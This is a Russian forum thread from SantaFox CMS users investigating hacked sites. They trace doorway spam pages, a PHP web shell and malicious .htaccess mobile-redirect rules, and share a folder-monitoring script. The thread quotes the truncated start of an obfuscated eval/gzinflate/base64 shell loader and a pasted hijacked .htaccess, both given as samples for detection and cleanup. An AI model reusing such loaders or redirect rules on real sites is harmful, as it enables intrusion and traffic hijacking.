Система управления контентом SantaFox

Работа с SantaFox => Безопасность => Тема начата: arteshuk от 09 Декабрь 2011, 12:31:48

Название: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 09 Декабрь 2011, 12:31:48
ситуация следующая. Стоит санта на хостинге

на хостинге, в корне сайта, появляется некая папка (system, userи т.д.), в которой тысячи станиц....

иногда в .htaccess то же вносятся изменения....

вопрос вот в чем: дырка у хостинга или у санты?

кто как считает?

Просто хочется понять в какую сторону копать....

Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 09 Декабрь 2011, 13:35:00
сказал бы что за хостинг, и что за страницы в папке, код страницы любой выложил бы, тогда было бы чуток понятней)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 12 Декабрь 2011, 15:36:30
Да....вобщем-то код и сами страницы сейчас можно глянуть на нашем любимом сайте....


 http://santafox.ru/content/nokia-8800-instruktsiya-932.html
 http://santafox.ru/content/yaponskie-zhurnali-vyazanie-181.html

ну и страниц там таких пару тысяч.....

Осликс.....не сноси пожалуцста пока эту папку...давайте вместе искать дырку...где бы она не была..на хостинге или в санте...

Но тут ситуация посложнее :) ибо просто удалить папку нельзя, ибо удалится весь контент самого сайта.....
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 12 Декабрь 2011, 17:44:55
и самое интересное :)

все эти ссылки уже проиндексированы и яндексом и гуглом.....

http://www.google.com.ua/search?source=ig&hl=ru&rlz=1G1GGLQ_UKUA275&q=site:http://arteshuk.tk/&aq=f&aqi=&aql=&oq=#q=site:http://santafox.ru&hl=ru&rlz=1G1GGLQ_UKUA275&prmd=imvns&ei=twTmTsr2LovKsgbd0ciYCQ&start=40&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=63c2e2d1812121e7&biw=1280&bih=709
Название: Re: Взывая к помощи коллективного разума!
Отправлено: digi от 12 Декабрь 2011, 18:17:19
мдаа.. получается где-то дыра :)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 12 Декабрь 2011, 18:29:54
мдаа.. получается где-то дыра :)

есть какие соображения где????
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 12 Декабрь 2011, 18:49:45
ссылки уже удалили :(

http://www.webpagescreenshot.info/img/574755-1212201144502PM

в самом низу страницы есть адрес, с которого сделан скриншот....

ну это чтоб я пустословом не выглядел....

неужели никого этот вопрос не интересует?

по моему я более чем наглядно показал, на примере сайта http://www.santafox.ru/, с чем может столкнуться каждый.....

Название: Re: Взывая к помощи коллективного разума!
Отправлено: sanchez от 12 Декабрь 2011, 18:55:29
-я пока просто удалил мусор этот
-страниц не тысячи, там реврайт в .htaccess + один пхп-файл, который с одного сервера получает контент для отображения
-взламывают всех, не надо истерить. нет оснований считать, что уязвимость в самой CMS
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 12 Декабрь 2011, 19:00:24
я не истерю, я пытаюсь понять, дырка в системе или на хостинге?

в моем случае не было реврайтов....была папка размером около 50 Мб.
(сейчас посмотрел папку, в ней было 2037 страниц)
у меня есть архив этой папки, если кому интересно, могу выложить архив.

в случае у Roman, залезли в .htaccess и то же там "наворочали" делов....

sanchez - я правильно понял, что насчет CMS мы можем спать спокойно и высказывать обоснованные претензии хостеру?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 12 Декабрь 2011, 19:38:03
-я пока просто удалил мусор этот
-страниц не тысячи, там реврайт в .htaccess + один пхп-файл, который с одного сервера получает контент для отображения
-взламывают всех, не надо истерить. нет оснований считать, что уязвимость в самой CMS

а когда Roman (тобишь я) писал и санчезу, и администрации -- все мимо ушей.
а что значит?
Цитировать
-взламывают всех, не надо истерить. нет оснований считать, что уязвимость в самой CMS
хостинги разные, а проблема у всех общая, может я ошибаюсь, но получается хостинги нипричем

у меня архивы этого дерьма тоже есть, могу скинуть кому надо.
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 15 Декабрь 2011, 00:12:51
программисты!
отпишите, что это за баг?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Oslix от 15 Декабрь 2011, 18:11:51
Други, видимо это дело в санте все-таки.
У меня просьба. У кого сохранились логи взлома (ну или просто логи и сайт до сих пор содержит вредоносный код, который может проанализировать санчез) - кеньте мне информацию на ilya@santafox.ru
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 16 Декабрь 2011, 16:57:41
Господа, раз у мы такие лопухи, и логов у нас нет, я предлагаю объединить усилия и выловить-таки эту гадость.

Что мы о ней знаем?

проникает на сайт и заливается в папки

/system  - в моем случае
/content - случай взлома сайта santafox и у Roman бяка сидела там же
/components - случай у Roman

как и когда попала туда эта шняги никто из нас не знает, я кинулся, когда был в топе яндекса по непонятным запросам, вплоть до порнухи....

Возможно я придумал не самый удачный способ, но на сегодняшний день никто других вариантов не предложил....

Да, сразу оговорюсь: это не патч латающий брешь в безопасности вашего сайта, от заражения он не спасет, но поможет отловить откуда бяка залезла. Это нужно нам всем. Многие из вас делают сайты на заказ. Когда через месяц после сдачи сайта заказчику, он, как бы случайно, обнаружит, что по запросу в яндексе "самые большие сиськи Бразилии" его сайт (который кстати не хухры-мухры, а консалтинговые услуги) на первом месте в поисковой выдаче, последствия для вас несложно себе представить......

Итак, суть способа такова:
Скрипт делает проверку папок на сервере, в случае если видит "не родную" папку, админ получает письмо в почту.
(тут мы убиваем еще одного зайца, знаем время взлома, проще будет ковырять логи)

В приложении к сообщению есть файл  virus_on_santafox.zip, скачиваем, открываем любым редактором (хоть блокнотом)
первая строка кода:

$email_admin = 'arteshuk@gmail.com'; // укажите свой емаил!!!!В ней пишите мыло, на которое получите уведомление в случае заражения.

Далее сохраняем файл и его надо залить в папку
/modules/evalmod/files/
Далее, через модуль "Произвольный код", создаем действие "выполнить код из файла", где указываем мой файлик.

Идем с шаблон главной страницы сайта, создаем (в любом удобном месте) метку, на которую выводим выше созданное действие.

Все!

Для тех кому лень настраивать модуль, в приложении файлик index.php. В нем надо изменить мыло на свое и залить в корень вместо имеющегося там файла index.php. Эффект будет тот же, что и при настройке модуля произвольного кода.

ВНИМАНИЕ!!! Не бойтесь этого делать, скрипт работает МОЛЧА, никаких изменений на сайте, ни на зараженном, ни на чистом вы не увидите!!!

Теперь поясню как это работает:

Как только, в известные нам папки попадет "левый" файлик, админ тут же получит на почту сообщение типа:

VIRUS on SantaFox
     от root@arteshuk.tk
site:arteshuk.tk on folder: system


где arteshuk.tk - это зараженный сайт, system - это папка в которой все это дело лежит

как только вы получили это сообщение, тут же пишем в эту тему, или Oslix, дальше мы расскажем что делать....

ТЕПЕРЬ ВНИМАНИЕ!

1. Данный скрипт правильно работает на версиях от 2.05 и старше!!! (младше я пока не проверял)
Если кто-то хочет поставить себе такую ловушку на другие версии, пишите мне, я напишу под любую имеющуюся.


Мои опасения оказались напрасны, смело ставьте на любую версию санты, но смотрим пункт 2!!!

2. В корне сайта, у вас не должно быть "левых папок", т.е. должен быть стандартный набор папок из дистрибутива санты. Если кто хранит в корне сайта кучу всяких "левых" папок, так же пишите, я расскажу как сделать так что бы и у вас работало.


Заранее спасибо всем, кто поможет поймать бяку....ну и тем кто дочитал до конца.

Чтоб не флудить в теме, вопросы типа а как? а где, а почему а зачем, давайте в личку аську или почту :) 
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 16 Декабрь 2011, 18:37:51
кому лень настраивать модуль, можно в index.php вставить перед последним ?>

и самое главное $email_admin = 'mail@gmail.com';// почта ИЗМЕНИТЕ НА СВОЮ

$email_admin = 'mail@gmail.com';// почта ИЗМЕНИТЕ НА СВОЮ
$santa = array('','admin', 'backup', 'cache', 'components', 'content', 'include', 'modules','upload','design'); // ЕСЛИ ЕСТЬ НЕ СИСТЕМНЫЕ ПАПКИ СВОИ -- ДОБАВЬТЕ В СПИСОК
$target = './';
$weeds = array('.', '..');
$directories = array_diff(scandir('./'), $weeds);
$string = '';
$folder = '';
foreach($directories as $value)
{ if(is_dir($target.$value)) {$string .= ' '.$value;}}
$arr_santa = explode (' ', $string);
$result = array_diff($arr_santa, $santa);
if($result){
foreach($result as $folder) {
mail($email_admin, 'VIRUS on SantaFox', 'site:'.$_SERVER['HTTP_HOST'].' on folder: '.$folder.'');}}
$content = array_diff(scandir('./content'), $weeds);
$result_c = count($content);
if ($result_c !=3)
mail($email_admin, 'VIRUS on SantaFox', 'site:'.$_SERVER['HTTP_HOST'].' on folder: /content');
$components = array_diff(scandir('./components'), $weeds);
$result_comp = count($components);
if ($result_comp !=6)
mail($email_admin, 'VIRUS on SantaFox', 'site:'.$_SERVER['HTTP_HOST'].' on folder: /components');
Название: Re: Взывая к помощи коллективного разума!
Отправлено: sanchez от 16 Декабрь 2011, 18:47:51
ужасное решение
1) проверка только папок
2) проверка при КАЖДОМ обращении к сайту
3) чтобы узнать время появления новых файлов-папок на сервере, достаточно посмотреть время их создания, емейлы тут ни к чему
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 16 Декабрь 2011, 18:50:00
ужасное решение
1) проверка только папок
2) проверка при КАЖДОМ обращении к сайту
3) чтобы узнать время появления новых файлов-папок на сервере, достаточно посмотреть время их создания, емейлы тут ни к чему

ждем ваше решение
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 16 Декабрь 2011, 18:55:12
ужасное решение

да, но никто, в том числе и ты, не предложил лучшего....

Цитировать
1) проверка только папок

есть инфа что был одни файл? Есть, так поделись, напишем....любой файл, пусть даже, как ты писал выше один файл (исправлено мной в 19.00 по мск), в папке /content  выдаст себя....

Цитировать
2) проверка при КАЖДОМ обращении к сайту

именно на это и рассчитано, отловим до секунды, БД не грузит, что не так-то? Сильно "3" строки кода нагрузят сайт?

Цитировать
3) чтобы узнать время появления новых файлов-папок на сервере, достаточно посмотреть время их создания, емейлы тут ни к чему

совершенно верно, но проще посмотреть логи за 10 минут чем за 3 месяца? Не будешь же отрицать?

про емайлы: 1 емаил в день никого не утянет.....а если будет заражен и их будет 100 в день, опять же польза, не заметить не получится.... (исправлено мной в 19.09 мск)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 17 Декабрь 2011, 00:23:32
да правильное решение предложил arteshuk, браво!!!

а то что санчез написал про "ужасное решениe"
ну так кто тебе мешает сделать лучше?


P.S. ужасно ничего не делать при такой дыре в cms... можете ставить минуса и т.д., как Вам угодно, просто cms супер, а развитие на нуле!

Понятно что развитие cms стоит денег, например переписать админку на jquery стоит денег и т.д., а Вам за бесплатно как бы лениво все это делать, ну так сделайте раздел для тех кто готов вкладывать деньги, в вашу cms и получать от этой системы прекрасный результат...
Название: Re: Взывая к помощи коллективного разума!
Отправлено: sanchez от 17 Декабрь 2011, 11:57:06
а я и не собирался антивирус какойто на пхп писать
и до сих пор не верю, что дырка в самой cms
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 17 Декабрь 2011, 12:00:22
а я и не собирался антивирус какойто на пхп писать
и до сих пор не верю, что дырка в самой cms

хостинги у всех разные, проблема одна
Название: Re: Взывая к помощи коллективного разума!
Отправлено: sanchez от 17 Декабрь 2011, 18:31:51
хостинги у всех разные, проблема одна
проблема не одна
и я также могу сделать вывод:
на всех хостингах установлен пхп+mysql ---- значит проблема в пхп или mysql
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 17 Декабрь 2011, 20:12:10
проблема не одна

Ну...проблемы действительно две:
1. это сайты обычных пользователей, на хостингах средней паршивости...
2. оф сайт cms santafox, на "отдельном" сервере, с защитой и т.д. Ну и плюс сама cms, то же не как у обычных пользователей....

Цитировать
и я также могу сделать вывод:
на всех хостингах установлен пхп+mysql ---- значит проблема в пхп или mysql

странно как это ты апач пропустил :)

Ну ладно, отношение некоторой части разработчиков к проблеме всем предельно понятно, если двумя словами: то сами вы дураки, руки у вас из ...опы и обе левые, да плюс еще ужасные решения в бестолковой башке.....

Ок, но...мы то же не пальцем деланные, найдем решение проблемы сами....
Самое на мой взгляд важное, что мы ее ищем, да, плохо, не умело, коряво, через одно место....но ищем...и найдем...
Еще попросите его дать :)

Спасибо.
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 18 Декабрь 2011, 20:26:37
Появилась новая инфа.

"Бяка" может заводится так же в папке /admin/help

"Ловушку" допишу и выложу в ближайшее время.....
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Oslix от 19 Декабрь 2011, 10:12:08
Еще раз с вопросом обращусь. Остались ли у кого-нить логи?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 19 Декабрь 2011, 12:28:35
Еще раз с вопросом обращусь. Остались ли у кого-нить логи?

логов нет, поскольку об взломе узнаешь через webmaster.yandex.ru, когда там вместо 100 страниц отображается пара тысяч  а что хранить логи пару месяцев надо думаю никто и не знает.

поставили ловушки Димы, будем ждать
Название: Re: Взывая к помощи коллективного разума!
Отправлено: W.D.M.Group от 25 Январь 2012, 22:48:22
Как вариант, лучше скрипт (или специальную страницу с "произвольным кодом") на крон поставить и в полночь проводить проверку на наличие инородных папок!?

Ещё лучше допилить скрипт, чтоб не только папки проверял, но файлы, в т.ч. ловил на лету все изменения производимые пользователями авторизованными в системе, понимал что создаётся, что удаляется... вёл свою таблицу в БД. Но это всё как минимум тянет на отдельный модуль или фикс к Санте.

З.ы.: я сегодня генератор идей ;D ;D ;D

Да, вот ещё чё подумал. Может в мыло стоит добавить кусок лога с сервера, ну там ЙаПи, запросы и т.д. за последние сутки например... так и отловим эту гадость и морду ему набъём!!!
Название: Re: Взывая к помощи коллективного разума!
Отправлено: W.D.M.Group от 26 Январь 2012, 22:07:36
Как вариант, лучше скрипт (или специальную страницу с "произвольным кодом") на крон поставить и в полночь проводить проверку на наличие инородных папок!?

Ещё лучше допилить скрипт, чтоб не только папки проверял, но файлы, в т.ч. ловил на лету все изменения производимые пользователями авторизованными в системе, понимал что создаётся, что удаляется... вёл свою таблицу в БД. Но это всё как минимум тянет на отдельный модуль или фикс к Санте.

З.ы.: я сегодня генератор идей ;D ;D ;D

Да, вот ещё чё подумал. Может в мыло стоит добавить кусок лога с сервера, ну там ЙаПи, запросы и т.д. за последние сутки например... так и отловим эту гадость и морду ему набъём!!!

Сегодня стал свидетелями разговора наших сисадминов... по сути полезного и подслушанного  ;D может авторизацию администраторов на сайте по МАК-адресу реализовать!?

Ещё, рассказали что сейчас хрень бродит виру-не-вирус, но палит ФТП и передачу данных по нему... так, что если на сайте папочки левые, то это 75% через ФТП, доступ к которому увели  :D
Возникает вопрос для тех у кого хацкеры проявили активность: заходите ли Вы на сайт по ФТП!? и 2-е: прописан ли доступ к ФТП в ини.пхп!?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 27 Январь 2012, 09:56:23
Возникает вопрос для тех у кого хацкеры проявили активность:

Цитировать
заходите ли Вы на сайт по ФТП!?
да, а как еще?

Цитировать
и 2-е: прописан ли доступ к ФТП в ини.пхп!?
нет
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 09 Февраль 2012, 19:35:00
появились кое какие новости по этому вопросу...

в расставленные Roman ловушки моего"изобретения" угодила рыбка...

т.е. некто создал новую папку на сервере и загрузил в нее файл...тут сработала ловушка....

изучили логи, и выяснилось, что на сайте сидит шелл...

шелл нашли.....убили....

теперь о грустном: к сожалению...сам шелл был залит на сайт гораздо раньше...т.е. главный ответ на главный вопрос, как оно попало на сайт пока открыт...


Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 10 Февраль 2012, 14:53:29
Я рад что тема актуальна, сообщество проявляет сознательность и живой интерес и бурно обсуждает проблему :)

Ладно, очередная пилюлька в приложенном файле.

Работает очень просто: загружаем в корень сайта, заходим по адресу http://site.ru/dir.php

ВНИМАНИЕ! Скрипт довольно "тяжелый".... у меня на хостинге выполняется без проблем, денвер через раз писал что 30 секунд на выполнение скрипта ему не хватает....

и так, запустили файл, увидели примерно следующее:


Есть подозрение что ты не один командуешь сайтом, необходимо проверить следуюшие файлы:
./in/index.php
./in/newindex.php
./include/kernel.class1.php
./components/html_editor/filemanager/classes/Savant2/tests/resources/Savant2_Plugin_festera.php

 

в этом списке отобразятся все "неродные" файлы санты.....

для примера, вот то что выделено жирным: это и был шелл, через который можно делать абсолютно все не только с больным сайтом, но и с другими сайтами на аккаунте хостинга.

Еще, на нескольких сайтах был найден файлик

/components/html_editor/plugins/tinybrowser/userpageadmin.php

Есть предположение, что сайты были сломаны через редактор....

А теперь я хочу обратиться ко всем, кому не безразлична санта.....

Пожалуйста, не поленитесь и проверьте свой сайт, проверка занимает 5 минут времени....если найдете файл примерно такого содержания:

<?php
preg_replace
("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x
73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'XfznrsRckh2I/hegd/hUt4HqvpSa3t1WC0OT9C7p
SbVQoE167wfz7pdftQbSzAHyMEluEzv2ioi1eDIPCJZJghU5hcE0hOc0TGYp+eeRoHGygMk0KRC6fO8mKY
HAVIKkCZajGIbRcAKXaE7kaIFDBALlWIqiMFwUBE0mCIWXJJRiNEqWOIakRF7ABPF2wLKSQIscRwuChIks
IzKahpEyT0iIouECejujBJ7RCESXEI1RKIa/Z3mZZFiCQVCe4DhRwhBF0Xj2WpnCVEHnKQ2lBUlBMJQgJUy
XJIkWWQJDeYmg

и тут еще много строк такой же абракадабры

вас можно поздравить, шелл живет и здравствует у вас на аккаунте хостинга....

Найденный файл, Я ОЧЕНЬ прошу прислать мне arteshuk@gmail.com......

буду собирать коллекцию шеллов :) 2 уже нашли, один декодировали и проверили в работе, потрясающая вещь, можно сделать все что угодно с сайтом, БД и вообще...., любые скрипты из консоли....спам рассылать, так как 2 пальца....
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 10 Февраль 2012, 15:39:02
Проверил практически все сайты, все чисто, единственный момент в сборе санты версия 1,14

файл - "/components/html_editor/plugins/tinybrowser/userpageadmin.php" сразу идет вместе со сборкой!  >:(
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 10 Февраль 2012, 15:46:37
файл - "/components/html_editor/plugins/tinybrowser/userpageadmin.php" сразу идет вместе со сборкой!  >:(

у меня аналогичное, все старые сайты, версии 1251 с этой хренью /components/html_editor/plugins/tinybrowser/userpageadmin.php
Название: Re: Взывая к помощи коллективного разума!
Отправлено: bubek от 10 Февраль 2012, 16:24:26
Если погуглить (https://www.google.com/search?hl=ru&lr=&sa=X&ei=pQk1T7O4GYXEswbqxaCiDA&ved=0CBoQBSgA&q=plugins/tinybrowser/user+page+admin.php&spell=1#pq=plugins%2Ftinybrowser%2Fuser+page+admin.php&hl=ru&sugexp=erf1&cp=28&gs_id=a&xhr=t&q=plugins/tinybrowser/userpageadmin.php&pf=p&sclient=psy-ab&lr=&source=hp&pbx=1&oq=plugins/tinybrowser/userpageadmin.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=ef057abbf92ce37f&biw=1194&bih=738&bs=1) то данный файл можно найти и на других сайтах.
Скорей всего это стандартный файлик редактора.
Да, может и его использовали злоумышленники, чтобы взломать сайт.
Вот немного инфы (http://habrahabr.ru/company/sprinthost/blog/125839/) на эту тему
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 10 Февраль 2012, 16:42:47
пока у нас не будет логов....мы так и будем гадать :(

остается только надеяться, что кто-то найдет шелл у него будут логи за то время, когда он появился на сайте.....пока понять способ залития шелла у меня не получается....просто не от чего отталкиваться....именно по этому и пишу ловушки, может если массово проверить, что нибудь и поймаем....

только беда в том....что проверят 5-10 человек от силы (((((
Название: Re: Взывая к помощи коллективного разума!
Отправлено: duncan от 11 Февраль 2012, 00:27:01
шелл на локальном компьютере ловит антивирус, то есть, если делаете регулярные бекапы с файлами, то антивирь давно бы его спалил.
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 11 Февраль 2012, 11:04:27
шелл на локальном компьютере ловит антивирус, то есть, если делаете регулярные бекапы с файлами, то антивирь давно бы его спалил.

я за всех не скажу, но я никогда локально не храню, за меня бекапы ежедневно делает хостер....
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 05 Май 2012, 12:27:12
Дима, скинул файлик на почту просьба связаться со мной по аське, версия санты на данном сайте 1,14.
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 10 Май 2012, 10:03:06
глянул файлик...шелл это...
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 10 Май 2012, 12:51:09
ну я понял что шелл, для этого и скинул тебе, есть лог 19 апреля его закинули, развернули 6 мая вроде, поэтому и просил тебя связаться со мной чтобы я тебе логи скинул а то сервак их сотрет скоро)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Roman от 10 Май 2012, 12:52:38
а то сервак их сотрет скоро)

сохрани их, можешь мне тоже скинуть с логами?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 10 Май 2012, 13:46:10
сохрани их, можешь мне тоже скинуть с логами?

можешь в аську стукнуть поговорим  ;)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: iSergio от 30 Июль 2012, 15:56:29
Скинул на почту шелл, который нашел на своем хостинге... Прятался в корне под js.php и в других папках под псевданимами... Меняю все пароли)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: mikola_design от 30 Июль 2012, 16:12:03
Скинул на почту шелл, который нашел на своем хостинге... Прятался в корне под js.php и в других папках под псевданимами... Меняю все пароли)

версия санты какая?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 30 Июль 2012, 16:23:38
Скинул на почту шелл, который нашел на своем хостинге... Прятался в корне под js.php и в других папках под псевданимами... Меняю все пароли)

спасибо, да, самый натуральный шелл это....

менять пароли мало, надо проверить на эту быку ВСЕ сайты на одном аккаунте хостинга!!!
Название: Re: Взывая к помощи коллективного разума!
Отправлено: Smile500 от 30 Июль 2012, 22:55:34
Дайте хоть одним глазком глянуть на этот шелл!
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 23 Август 2012, 19:52:26
Я рад что тема актуальна, сообщество проявляет сознательность и живой интерес и бурно обсуждает проблему :)

Ладно, очередная пилюлька в приложенном файле.

Работает очень просто: загружаем в корень сайта, заходим по адресу http://site.ru/dir.php

ВНИМАНИЕ! Скрипт довольно "тяжелый".... у меня на хостинге выполняется без проблем, денвер через раз писал что 30 секунд на выполнение скрипта ему не хватает....

и так, запустили файл, увидели примерно следующее:


Есть подозрение что ты не один командуешь сайтом, необходимо проверить следуюшие файлы:
./in/index.php
./in/newindex.php
./include/kernel.class1.php
./components/html_editor/filemanager/classes/Savant2/tests/resources/Savant2_Plugin_festera.php

 

в этом списке отобразятся все "неродные" файлы санты.....

для примера, вот то что выделено жирным: это и был шелл, через который можно делать абсолютно все не только с больным сайтом, но и с другими сайтами на аккаунте хостинга.

Еще, на нескольких сайтах был найден файлик

/components/html_editor/plugins/tinybrowser/userpageadmin.php

Есть предположение, что сайты были сломаны через редактор....

А теперь я хочу обратиться ко всем, кому не безразлична санта.....

Пожалуйста, не поленитесь и проверьте свой сайт, проверка занимает 5 минут времени....если найдете файл примерно такого содержания:

<?php
preg_replace
("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x
73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'XfznrsRckh2I/hegd/hUt4HqvpSa3t1WC0OT9C7p
SbVQoE167wfz7pdftQbSzAHyMEluEzv2ioi1eDIPCJZJghU5hcE0hOc0TGYp+eeRoHGygMk0KRC6fO8mKY
HAVIKkCZajGIbRcAKXaE7kaIFDBALlWIqiMFwUBE0mCIWXJJRiNEqWOIakRF7ABPF2wLKSQIscRwuChIks
IzKahpEyT0iIouECejujBJ7RCESXEI1RKIa/Z3mZZFiCQVCe4DhRwhBF0Xj2WpnCVEHnKQ2lBUlBMJQgJUy
XJIkWWQJDeYmg

и тут еще много строк такой же абракадабры

вас можно поздравить, шелл живет и здравствует у вас на аккаунте хостинга....

Найденный файл, Я ОЧЕНЬ прошу прислать мне arteshuk@gmail.com......

буду собирать коллекцию шеллов :) 2 уже нашли, один декодировали и проверили в работе, потрясающая вещь, можно сделать все что угодно с сайтом, БД и вообще...., любые скрипты из консоли....спам рассылать, так как 2 пальца....
вот появился такой файл - только он не сохраняется через фтп.
Есть подозрение что ты не один командуешь сайтом, необходимо проверить следуюшие файлы:
адрес 1
адрес 2
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 23 Август 2012, 20:12:07
пришли мне в почту ссылку на сайт, я посмотрю что за файлы
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 23 Август 2012, 20:38:51
мдя......народ совсем ахринел, шелы без паролей заливают, заходи бери кто хочет :(
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 23 Август 2012, 20:40:34
мдя......народ совсем ахринел, шелы без паролей заливают, заходи бери кто хочет :(
так это что значит - что делать? и как от этого уберечься в будущем? и кто это сделал и как?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 23 Август 2012, 20:43:11
мдя......народ совсем ахринел, шелы без паролей заливают, заходи бери кто хочет :(
так это что значит - что делать? и как от этого уберечься в будущем? и кто это сделал и как?

я тебе в почту все отписал, отвечай там, сейчас надо СРОЧНО почистить сайт, а потом уже разбираться что и как....

если через 3 минуты у тебя на сайте появится задница во весь экран, это будет даже не удивительно, сделать сейчас это может ЛЮБОЙ....даже не тот кто сломал сайт.

какая версия санты у тебя?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 29 Январь 2013, 12:35:11
мдя......народ совсем ахринел, шелы без паролей заливают, заходи бери кто хочет :(
так это что значит - что делать? и как от этого уберечься в будущем? и кто это сделал и как?

я тебе в почту все отписал, отвечай там, сейчас надо СРОЧНО почистить сайт, а потом уже разбираться что и как....

если через 3 минуты у тебя на сайте появится задница во весь экран, это будет даже не удивительно, сделать сейчас это может ЛЮБОЙ....даже не тот кто сломал сайт.

какая версия санты у тебя?
Опять появились дополнительные файлы. Короче история такая. Санта 2.6.
Есть домен на хостинге сайт.ru (сделан на санте). Есть еще один домен сайт1.ru - расположен на этом же хостинге, как дополнительный домен, то есть лежит в корне сайт.ru.
И вот сообщили люди, что касперский считает сайт1.ru заразным. Посмотрел - появились файлы (причем сайт.ru полностью чистый). Почистил файлы, поменял пароли - прошло несколько дней, опять появился файл.
Вопрос: что надо просмотреть?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 29 Январь 2013, 12:38:06
Вопрос: что надо просмотреть?

Надо найти и убить шелл
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 29 Январь 2013, 12:47:15
Вопрос: что надо просмотреть?

Надо найти и убить шелл
то есть удалить файл? но он опять может появиться. или найти и убить шелл - это как то по другому?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 29 Январь 2013, 12:53:30
то место, где появляются файлы совсем не означает, что шелл лежит то же в этой папке, скорее даже наоборот, его как правило прячут подальше.

И пока он сидит на сайте, удаляй не удаляй, можно зайти в в любое время залить
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 29 Январь 2013, 12:55:12
то место, где появляются файлы совсем не означает, что шелл лежит то же в этой папке, скорее даже наоборот, его как правило прячут подальше.

И пока он сидит на сайте, удаляй не удаляй, можно зайти в в любое время залить
а как его поискать то?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 29 Январь 2013, 12:58:38
а как его поискать то?

отписал в личку
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 30 Январь 2013, 09:32:36
а как его поискать то?

отписал в личку
не смотрел еще? просто на почту пишу - ничего. может не дошло письмо?
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 30 Январь 2013, 09:36:58
нет (
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 30 Январь 2013, 09:41:07
нет (
не дошло? или не смотрел? или просто нет)
Название: Re: Взывая к помощи коллективного разума!
Отправлено: arteshuk от 30 Январь 2013, 09:42:11
В личку напиши и все!!!
Название: Re: Взывая к помощи коллективного разума!
Отправлено: alexandr от 18 Февраль 2013, 23:31:44
то место, где появляются файлы совсем не означает, что шелл лежит то же в этой папке, скорее даже наоборот, его как правило прячут подальше.

И пока он сидит на сайте, удаляй не удаляй, можно зайти в в любое время залить
короче, как и писал раньше появлялись посторонние файлы. а теперь все время переписывается файл .htaccess. причем, когда заходишь с компа, ничего не видно. а когда например с андроида - идет переадрессация на сайт какой то. я уже и версию санты новую поставил, все почистил - и ни фига. уже не знаю что делать.
а в файле .htaccess вот такое письмо появляется)
RewriteBase /
RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule   ^[a-z0-9_-]*\.html$ index.php

AddDefaultCharset UTF-8
AddType text/x-component .htc
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]
RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]
